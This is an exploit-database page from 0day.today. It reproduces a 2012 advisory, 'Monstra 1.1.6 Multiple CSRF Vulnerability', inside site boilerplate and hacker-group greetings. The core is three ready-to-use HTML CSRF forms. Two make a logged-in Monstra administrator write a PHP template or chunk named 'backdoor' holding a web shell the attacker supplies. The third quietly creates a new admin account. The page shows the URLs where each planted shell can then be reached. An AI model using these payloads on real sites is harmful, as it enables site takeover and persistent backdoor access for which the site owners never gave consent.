0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Monstra - Version 1.1.6 Multiple CSRF Vulnerability
1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 0 [x] Official Website: http://www.1337day.com 1 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 0 0 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx «««:»»» CMS Monstra - Multiple CSRF Vulnerability «««:»»» xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ./Title Exploit : Monstra CMS - Multiple CSRF Vulnerability ./CMS Version : Monstra - Version 1.1.6 (Last Version). ./Software Link : www.monstra.org ./Category XPL : [ WebApps/ZeroDay ] ./Security Risk : [ High Level ] ./Time & Date : June, 26 2012. 07:02 AM, Solo Raya, Indonesian. ./System Tested : Windows 7 Ultimate, Firefox 9.0.1, Xampp-win32-1.7.3 ./Discovered By : -=[ TheCyberNuxbie - Independent Security Research ]=- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||| -=[ Use It At Your Risk ]=- ||| ||| This Was Written For Educational Purpos Only ||| ||| Author Will Be Not Responsible For Any Damage ||| xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ################################################################################# # - POC: # 1.1.1 Exploit - CSRF PHP Injection (add_template). # 1.1.2 Exploit - CSRF PHP Injection (add_chunk). # 1.2.1 Exploit - CSRF (Add Admin). ################################################################################# # # - Information Details: # Monstra - Fast and small content management system written in PHP! # http://www.monstra.org # ################################################################################# # # 1.1 Exploit - CSRF PHP Injection: # # 1.1.1 Exploit - CSRF PHP Injection (add_template): # ../admin/index.php?id=themes&action=add_template # # <html> # <head> # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> # <title>CMS Monstra - CSRF PHP Injection Exploit</title> # </head> # <body> # <form action="http://127.0.0.1/monstra/admin/index.php?id=themes&action=add_template" method="post" class="form-horizontal"> # <input type="hidden" name="name" value="backdoor"/> # <textarea type="hidden" name="content"> # [ PASTE YOUR SHELL HERE ] # </textarea> # <input type="submit" name="add_template" value="Injection" class="btn" /> # </form> # </body> # </html> # # - Create new template: .template.php # http://127.0.0.1/monstra/public/themes/default/ <--- [directory] # http://127.0.0.1/monstra/public/themes/default/[name].template.php # http://127.0.0.1/monstra/public/themes/default/backdoor.template.php <--- Your Shell. # # [ End Of Code ] # # # 1.1.2 Exploit - CSRF PHP Injection (add_chunk): # ../admin/index.php?id=themes&action=add_chunk # # <html> # <head> # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> # <title>CMS Monstra - CSRF PHP Injection Exploit</title> # </head> # <body> # <form action="http://127.0.0.1/monstra/admin/index.php?id=themes&action=add_chunk" method="post" class="form-horizontal"> # <input type="hidden" name="name" value="backdoor"/> # <textarea type="hidden" name="content"> # [ PASTE YOUR SHELL HERE ] # </textarea> # <input type="submit" name="add_chunk" value="Injection" class="btn" /> # </form> # </body> # </html> # # - Create new chunk: .chunk.php # http://127.0.0.1/monstra/public/themes/default/ <--- [directory] # http://127.0.0.1/monstra/public/themes/default/[name].chunk.php # http://127.0.0.1/monstra/public/themes/default/backdoor.chunk.php <--- Your Shell. # # [ End Of Code ] # # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # # 1.2 Exploit - CSRF (Add Admin): # # <html> # <head> # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> # <title>CMS Monstra - CSRF Add Admin Exploit</title> # </head> # <body> # <form action="http://127.0.0.1/monstra/admin/index.php?id=users&action=add" method="post"> # <input type="hidden" name="login" value="nuxbie" /> # <input type="hidden" name="password" value="nuxbie" /> # <input type="hidden" name="email" value="root@31337sec.com" /> # <select type="hidden" name="role"><option value="admin" ></option></select> # <input type="submit" name="register" value="Register" class="btn default" /> # </form> # </body> # </html> # # [ End Of Code ] # # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # # - Special Thanks: # ...:::' 1337day - Inj3ct0r TEAM ':::... # BoSs r0073r & All 31337 Member Inj3ct0r TEAM,,, # , And All Inj3ct0r Fans & All Hacktivist,,, # # xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx # # [ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de | SekuritiOnline ] # # [ Codenesia | ID-BackTrack | IndonesianCoder | IndonesianHacker | JatimCrew ] # # [ E-C-H-O | ExploreCrew | Hacker-Newbie | Jasakom | YogyaCarderLink ./etc.. ] # # -------------------[ We Are c0d3rs And We Are An Exploit ]------------------- # # [ r0073r, Sid3^effects, r4dc0re, CrosS, SeeMe, indoushka, KnocKout, ZoRLu ] # # [ anT!-Tr0J4n, KedAns-Dz, Kalashinkov3, Angel Injection, Sammy FORGIT, NoGe ] # # [ cr4wl3r, n0n0x, cyberlog, eidelweiss, v3n0m, g3mb3lz_YCL, Hmei7, kaMtiEz ] # # [ y3dips, K-159, the_day, k1tk4t, mywisdom, Flyff666, ketek_b374k, Elmonny ] # # [ jos_ali_joe, vYc0d, Cyberbag0r, SeekerUnZero, Dencowbie, Alex_Maxsum41 ] # # [ Teh Nofia, Teh Mawar, Teh Zuzzeta, Teh AfniGates, Chibie Reanaey ,etc... ] # ################################################################################# # 0day.today [2024-11-16] #